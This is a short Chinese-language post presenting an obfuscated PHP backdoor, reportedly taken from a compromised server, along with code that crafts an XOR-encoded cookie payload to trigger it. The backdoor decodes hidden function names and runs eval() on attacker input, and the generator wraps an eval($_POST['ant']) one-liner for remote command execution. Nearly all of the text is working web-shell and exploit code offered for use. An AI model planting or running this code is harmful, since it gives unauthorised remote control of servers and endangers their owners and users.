服务器上获取的一个后门， 以及对应利用方法

加密的后门代码：

<?php
$nxdhjel = '23bum*4\'ni#ptf1sdklxH9y_-6r08geovac';$vaiyh = Array();$vaiyh[] = $nxdhjel[20].$nxdhjel[5];$vaiyh[] = $nxdhjel[10];$vaiyh[] = $nxdhjel[0].$nxdhjel[27].$nxdhjel[33].$nxdhjel[27].$nxdhjel[25].$nxdhjel[13].$nxdhjel[0].$nxdhjel[14].$nxdhjel[24].$nxdhjel[2].$nxdhjel[30].$nxdhjel[0].$nxdhjel[27].$nxdhjel[24].$nxdhjel[6].$nxdhjel[30].$nxdhjel[21].$nxdhjel[34].$nxdhjel[24].$nxdhjel[2].$nxdhjel[1].$nxdhjel[30].$nxdhjel[30].$nxdhjel[24].$nxdhjel[6].$nxdhjel[2].$nxdhjel[6].$nxdhjel[2].$nxdhjel[0].$nxdhjel[28].$nxdhjel[25].$nxdhjel[6].$nxdhjel[16].$nxdhjel[2].$nxdhjel[30].$nxdhjel[33];$vaiyh[] = $nxdhjel[34].$nxdhjel[31].$nxdhjel[3].$nxdhjel[8].$nxdhjel[12];$vaiyh[] = $nxdhjel[15].$nxdhjel[12].$nxdhjel[26].$nxdhjel[23].$nxdhjel[26].$nxdhjel[30].$nxdhjel[11].$nxdhjel[30].$nxdhjel[33].$nxdhjel[12];$vaiyh[] = $nxdhjel[30].$nxdhjel[19].$nxdhjel[11].$nxdhjel[18].$nxdhjel[31].$nxdhjel[16].$nxdhjel[30];$vaiyh[] = $nxdhjel[15].$nxdhjel[3].$nxdhjel[2].$nxdhjel[15].$nxdhjel[12].$nxdhjel[26];$vaiyh[] = $nxdhjel[33].$nxdhjel[26].$nxdhjel[26].$nxdhjel[33].$nxdhjel[22].$nxdhjel[23].$nxdhjel[4].$nxdhjel[30].$nxdhjel[26].$nxdhjel[29].$nxdhjel[30];$vaiyh[] = $nxdhjel[15].$nxdhjel[12].$nxdhjel[26].$nxdhjel[18].$nxdhjel[30].$nxdhjel[8];$vaiyh[] = $nxdhjel[11].$nxdhjel[33].$nxdhjel[34].$nxdhjel[17];foreach ($vaiyh[7]($_COOKIE, $_POST) as $kluwf => $shfgsz){function gokotve($vaiyh, $kluwf, $lecsjeb){return $vaiyh[6]($vaiyh[4]($kluwf . $vaiyh[2], ($lecsjeb / $vaiyh[8]($kluwf)) + 1), 0, $lecsjeb);}function igaytvi($vaiyh, $dezmdr){return @$vaiyh[9]($vaiyh[0], $dezmdr);}function chbfsbk($vaiyh, $dezmdr){$flrvp = $vaiyh[3]($dezmdr) % 3;if (!$flrvp) {eval($dezmdr[1]($dezmdr[2]));exit();}}$shfgsz = igaytvi($vaiyh, $shfgsz);chbfsbk($vaiyh, $vaiyh[5]($vaiyh[1], $shfgsz ^ gokotve($vaiyh, $kluwf, $vaiyh[8]($shfgsz))));}

对应生成的利用代码：

function gokotve($kluwf, $lecsjeb) {
		return substr(str_repeat($kluwf . "20a06f21-be20-4e9c-b3ee-4b4b2864dbea", ($lecsjeb / strlen($kluwf)) + 1), 0, $lecsjeb);
	}

	 $shfgsz="22222222#base64_decode#ZXZhbCgkX1BPU1RbImFudCJdKTs=";
	$a=$shfgsz^ gokotve("a",	strlen($shfgsz));

  $aaa=bin2hex($a);
 		echo $aaa;

需要在获取的时候cookie部分加入即可，a=